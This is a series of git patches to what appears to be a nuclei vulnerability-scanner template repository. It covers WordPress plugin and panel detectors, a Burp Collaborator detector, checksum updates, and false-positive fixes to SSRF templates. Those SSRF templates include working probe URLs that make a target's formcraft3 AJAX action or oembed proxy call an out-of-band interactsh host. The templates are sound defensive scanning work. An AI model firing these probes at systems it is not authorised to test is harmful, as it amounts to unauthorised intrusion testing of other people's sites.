b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: - max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index f3c481b824..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: - max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index ba214fd7ea..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: - max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 8f5fe8d9a5..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: - max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 0458b13354..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: - max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index d570be07bf..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: - max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index ee05e3add8..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: - max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index df2487955f..1773857e15 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: - max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 79ff01211c..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: - max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 23414b3d1d..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: - max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index fba45020e4..56dfdf4a59 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ metadata: - max-request: 1 plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 0178c8e9fb..810fc82cde 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: - max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a04ddc6003..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: - max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 2ead906817..8bdc600063 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: - max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index dedd2e23b6..ab61cc0338 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: - max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 03cd7137a8..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: - max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index a68d4b7d78..d67150d038 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: - max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index bf9dfc3ad8..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: - max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 47911a86a5..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: - max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 1c25b6f488..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: - max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index b36317acd8..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: - max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 5eb35dd17e..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: - max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index ceb2b8d600..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: - max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From fc8d5d9817088655093be701ba2638479bf8d3de Mon Sep 17 00:00:00 2001 From: J4vaovo <128683738+j4vaovo@users.noreply.github.com> Date: Sun, 3 Sep 2023 05:59:37 +0800 Subject: [PATCH 0089/1090] fix fp CVE-2021-32819.yaml --- http/cves/2021/CVE-2021-32819.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/http/cves/2021/CVE-2021-32819.yaml b/http/cves/2021/CVE-2021-32819.yaml index 76aad330f6..8140272c3c 100644 --- a/http/cves/2021/CVE-2021-32819.yaml +++ b/http/cves/2021/CVE-2021-32819.yaml @@ -35,3 +35,8 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + + - type: word + part: interactsh_request + words: + - "User-Agent: Wget" From 5e5274108d0857e56a1f0e57695e74349d71c9df Mon Sep 17 00:00:00 2001 From: J4vaovo <128683738+j4vaovo@users.noreply.github.com> Date: Sun, 3 Sep 2023 07:13:32 +0800 Subject: [PATCH 0090/1090] fix fp wordpress-ssrf-oembed.yaml --- .../wordpress/wordpress-ssrf-oembed.yaml | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml b/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml index 9fecab4942..ac39f6ee4d 100644 --- a/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml +++ b/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml @@ -9,15 +9,21 @@ info: - https://github.com/incogbyte/quickpress/blob/master/core/req.go tags: wordpress,ssrf,oast,proxy metadata: + fofa-query: body="oembed" && body="wp-" max-request: 1 http: - method: GET path: + - "{{BaseURL}}/wp-json/oembed/1.0/proxy" - "{{BaseURL}}/wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}}/" + matchers-condition: and matchers: - - type: word - part: interactsh_protocol - words: - - "http" + - type: dsl + dsl: + - 'contains(to_lower(response_1), "rest_missing_callback_param")' + + - type: dsl + dsl: + - 'contains(interactsh_protocol, "http")' From a3b7335af6419f3edc7e25f4ed1fa68e5215f9df Mon Sep 17 00:00:00 2001 From: J4vaovo <128683738+j4vaovo@users.noreply.github.com> Date: Sun, 3 Sep 2023 07:22:48 +0800 Subject: [PATCH 0091/1090] fix fp CVE-2022-0591.yaml --- http/cves/2022/CVE-2022-0591.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/http/cves/2022/CVE-2022-0591.yaml b/http/cves/2022/CVE-2022-0591.yaml index dd2bf1faa7..d72a326c62 100644 --- a/http/cves/2022/CVE-2022-0591.yaml +++ b/http/cves/2022/CVE-2022-0591.yaml @@ -2,7 +2,7 @@ id: CVE-2022-0591 info: name: Formcraft3 <3.8.28 - Server-Side Request Forgery - author: Akincibor + author: Akincibor,j4vaovo severity: critical description: Formcraft3 before version 3.8.2 does not validate the URL parameter in the formcraft3_get AJAX action, leading to server-side request forgery issues exploitable by unauthenticated users. reference: @@ -32,3 +32,8 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + + - type: word + part: interactsh_request + words: + - "User-Agent: WordPress" From 4856ec61af57dc33d363614aa84b9cb3dad54886 Mon Sep 17 00:00:00 2001 From: J4vaovo <128683738+j4vaovo@users.noreply.github.com> Date: Sun, 3 Sep 2023 07:23:47 +0800 Subject: [PATCH 0092/1090] Update CVE-2022-0591.yaml --- http/cves/2022/CVE-2022-0591.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2022/CVE-2022-0591.yaml b/http/cves/2022/CVE-2022-0591.yaml index d72a326c62..918de34c02 100644 --- a/http/cves/2022/CVE-2022-0591.yaml +++ b/http/cves/2022/CVE-2022-0591.yaml @@ -16,6 +16,7 @@ info: epss-score: 0.00694 cpe: cpe:2.3:a:subtlewebinc:formcraft3:*:*:*:*:*:wordpress:*:* metadata: + fofa-query: body="formcraft3" && body="wp-" max-request: 1 framework: wordpress vendor: subtlewebinc From 4413725ebda2868397f74801c83787a795102490 Mon Sep 17 00:00:00 2001 From: J4vaovo <128683738+j4vaovo@users.noreply.github.com> Date: Sun, 3 Sep 2023 09:11:15 +0800 Subject: [PATCH 0093/1090] Update CVE-2022-0591.yaml --- http/cves/2022/CVE-2022-0591.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2022/CVE-2022-0591.yaml b/http/cves/2022/CVE-2022-0591.yaml index 918de34c02..9618c1296d 100644 --- a/http/cves/2022/CVE-2022-0591.yaml +++ b/http/cves/2022/CVE-2022-0591.yaml @@ -28,6 +28,7 @@ http: path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}' + matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction From 221a8f2cdbd4663fea8b34818f1b0dec91181b8b Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sun, 3 Sep 2023 17:44:32 +0200 Subject: [PATCH 0094/1090] Add snapcomms tpl --- http/exposed-panels/snapcomms-panel.yaml | 39 ++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 http/exposed-panels/snapcomms-panel.yaml diff --git a/http/exposed-panels/snapcomms-panel.yaml b/http/exposed-panels/snapcomms-panel.yaml new file mode 100644 index 0000000000..9c6508f8d8 --- /dev/null +++ b/http/exposed-panels/snapcomms-panel.yaml @@ -0,0 +1,39 @@ +id: snapcomms-panel + +info: + name: SnapComms Panel - Detect + author: righettod + severity: info + description: | + SnapComms was detected. + reference: + - https://www.snapcomms.com/ + metadata: + max-request: 1 + shodan-query: title:"Cryptobox" + verified: true + tags: panel,snapcomms,login,detect + +http: + - method: GET + path: + - '{{BaseURL}}/Manager/' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - ' SnapComms Content Manager' + case-insensitive: true + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'version=([0-9.]+)' \ No newline at end of file From f113116b632720765f3ce3b9fe4dbd63634a5392 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sun, 3 Sep 2023 17:49:53 +0200 Subject: [PATCH 0095/1090] Update and rename snapcomms-panel.yaml to snapcomms-content-manager-panel.yaml --- ...s-panel.yaml => snapcomms-content-manager-panel.yaml} | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) rename http/exposed-panels/{snapcomms-panel.yaml => snapcomms-content-manager-panel.yaml} (78%) diff --git a/http/exposed-panels/snapcomms-panel.yaml b/http/exposed-panels/snapcomms-content-manager-panel.yaml similarity index 78% rename from http/exposed-panels/snapcomms-panel.yaml rename to http/exposed-panels/snapcomms-content-manager-panel.yaml index 9c6508f8d8..004e5434a6 100644 --- a/http/exposed-panels/snapcomms-panel.yaml +++ b/http/exposed-panels/snapcomms-content-manager-panel.yaml @@ -1,16 +1,15 @@ -id: snapcomms-panel +id: snapcomms-content-manager-panel info: - name: SnapComms Panel - Detect + name: SnapComms Content Manager Panel - Detect author: righettod severity: info description: | - SnapComms was detected. + SnapComms Content Manager was detected. reference: - https://www.snapcomms.com/ metadata: max-request: 1 - shodan-query: title:"Cryptobox" verified: true tags: panel,snapcomms,login,detect @@ -36,4 +35,4 @@ http: part: body group: 1 regex: - - 'version=([0-9.]+)' \ No newline at end of file + - 'version=([0-9.]+)' From 9dfd44be540ab8ca9d162186fa70df30683ff15e Mon Sep 17 00:00:00 2001 From: lum8rjack <4932619+lum8rjack@users.noreply.github.com> Date: Sun, 3 Sep 2023 12:25:30 -0500 Subject: [PATCH 0096/1090] added burp-collaborator-detect --- .../burp-collaborator-detect.yaml | 42 +++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 http/technologies/burp-collaborator-detect.yaml diff --git a/http/technologies/burp-collaborator-detect.yaml b/http/technologies/burp-collaborator-detect.yaml new file mode 100644 index 0000000000..262b1b36f9 --- /dev/null +++ b/http/technologies/burp-collaborator-detect.yaml @@ -0,0 +1,42 @@ +id: burp-collaborator-detect + +info: + name: Burp Collaborator Server Running + author: lum8rjack + severity: info + description: | + Burp Collaborator server detected. + reference: + - https://portswigger.net/burp/documentation/collaborator + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + metadata: + max-request: 1 + verified: true + shodan-query: "Server: Burp Collaborator" + tags: burp,tech + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "Server: Burp Collaborator https://burpcollaborator.net/" + + - type: status + status: + - 200 + + extractors: + - type: regex + part: header + group: 1 + regex: + - "(?:X-(Collaborator-Version: [0-9]))" From 2d334e56ea32a34ae0aef95c68f8e3a23931d9d9 Mon Sep 17 00:00:00 2001 From: lum8rjack <4932619+lum8rjack@users.noreply.github.com> Date: Sun, 3 Sep 2023 12:32:16 -0500 Subject: [PATCH 0097/1090] fixed yaml lint error with spacing --- http/technologies/burp-collaborator-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/burp-collaborator-detect.yaml b/http/technologies/burp-collaborator-detect.yaml index 262b1b36f9..e1c9257e10 100644 --- a/http/technologies/burp-collaborator-detect.yaml +++ b/http/technologies/burp-collaborator-detect.yaml @@ -33,7 +33,7 @@ http: - type: status status: - 200 - + extractors: - type: regex part: header From e83d249d6022d2add65e46478a0bc7f8367a0c56 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 4 Sep 2023 02:25:25 +0000 Subject: [PATCH 0099/1090] Auto Generated Templates Checksum [Mon Sep 4 02:25:25 UTC 2023] :robot: --- templates-checksum.txt | 412 ++++++++++++++++++++--------------------- 1 file changed, 206 insertions(+), 206 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9ba60e3f08..eefa0e60d0 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -428,7 +428,7 @@ helpers/wordpress/plugins/force-regenerate-thumbnails.txt:32fecb37588747cdb82272 helpers/wordpress/plugins/formidable.txt:f6f8ec8cee0642425740179c78f2bf7d0a6572f1 helpers/wordpress/plugins/forminator.txt:b4b8f80f2ea205ffb78bb802455b396e7c718699 helpers/wordpress/plugins/ga-google-analytics.txt:48c07757afb07916aaceb81724ecfe2e17de1bc9 -helpers/wordpress/plugins/gdpr-cookie-compliance.txt:7595370f531837f97f90c203150920b879338d73 +helpers/wordpress/plugins/gdpr-cookie-compliance.txt:9e4d99fe9543741fae861b8214e954feb69c7c36 helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:be1f3ed636fa57d09193a4000944b026539f2ae8 helpers/wordpress/plugins/google-analytics-for-wordpress.txt:a62f0cd70e2969845fd702e631526007e426ec31 helpers/wordpress/plugins/google-listings-and-ads.txt:c78453b22ddacc88b67ece8b294a6b5930f15836 @@ -458,7 +458,7 @@ helpers/wordpress/plugins/leadin.txt:4ea6749184af2616dda4c6d36597b267338ca299 helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:eb7b3babdf22a684d0ea8660470e63f0a4a6f2d6 helpers/wordpress/plugins/limit-login-attempts.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/litespeed-cache.txt:a2246273db175b4d951c8ae09a9b87d55b422463 -helpers/wordpress/plugins/loco-translate.txt:c1c423f2f1813573ad1b704e4b6aea927ed8deb9 +helpers/wordpress/plugins/loco-translate.txt:fbd969c78e9a6d04b7b8fc3a74ee2ee96b5fb3d8 helpers/wordpress/plugins/loginizer.txt:9829113ed356f261f9202f78259f32919e9e5d9b helpers/wordpress/plugins/loginpress.txt:4ea93c6a1e320054f99d66f428e611b31355cd92 helpers/wordpress/plugins/mailchimp-for-woocommerce.txt:08d2e98e6754af941484848930ccbaddfefe13d6 @@ -556,7 +556,7 @@ helpers/wordpress/plugins/wp-multibyte-patch.txt:01fa77eedfbdd7455e8cf0cf239a4de helpers/wordpress/plugins/wp-optimize.txt:a80f092daaa12261340a5e337b2b07581bbb7e67 helpers/wordpress/plugins/wp-pagenavi.txt:53203701692767a1c2a24e47d94a090230bd8b3f helpers/wordpress/plugins/wp-reset.txt:1a907a1663fa62f8dac219d1a808e2abfcfa4f6a -helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt:1287384bc5ef3ab84a36a5ef1d888df2763567f4 +helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt:634805449eba3016dcc66622332c168ff4aff632 helpers/wordpress/plugins/wp-rollback.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad helpers/wordpress/plugins/wp-seopress.txt:75c41cf137a9a31823a6e465d81658ce9077457c helpers/wordpress/plugins/wp-sitemap-page.txt:1ae2b3145aeda5c94e1cc83b23d74521cf9cc3c5 @@ -3187,7 +3187,7 @@ http/exposed-panels/jenkins-login.yaml:5fe9ccde25e847ee2336291432548205458417b2 http/exposed-panels/jfrog-login.yaml:542094b95089031463b95a9c6d58a4828c2b014f http/exposed-panels/joget/joget-panel.yaml:bc5002eeb0525010057cad799870d4db802b5e02 http/exposed-panels/joomla-panel.yaml:42b9572c3f90c040698bd7cc18d3776d6d6f2fff -http/exposed-panels/jorani-panel.yaml:9422c56776d5d3173fe35807c1cd9f2d249246a0 +http/exposed-panels/jorani-panel.yaml:a2757264b4741c4ce569e46cc1f5d02cf727193f http/exposed-panels/jsherp-boot-panel.yaml:579e04ca2c497e3f1fbed58cc4a17376455a354f http/exposed-panels/jumpserver-panel.yaml:3a6580f5108db46ec3a36d756168706c8e70d586 http/exposed-panels/jupyter-notebook.yaml:e5647cad0cfefd5b693cb61473101b42da953dfc @@ -5796,217 +5796,217 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd -http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 +http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed +http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 -http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e -http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 -http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f -http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 -http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 -http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c -http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff -http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a -http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c -http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d -http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a -http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae -http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 -http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 +http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e 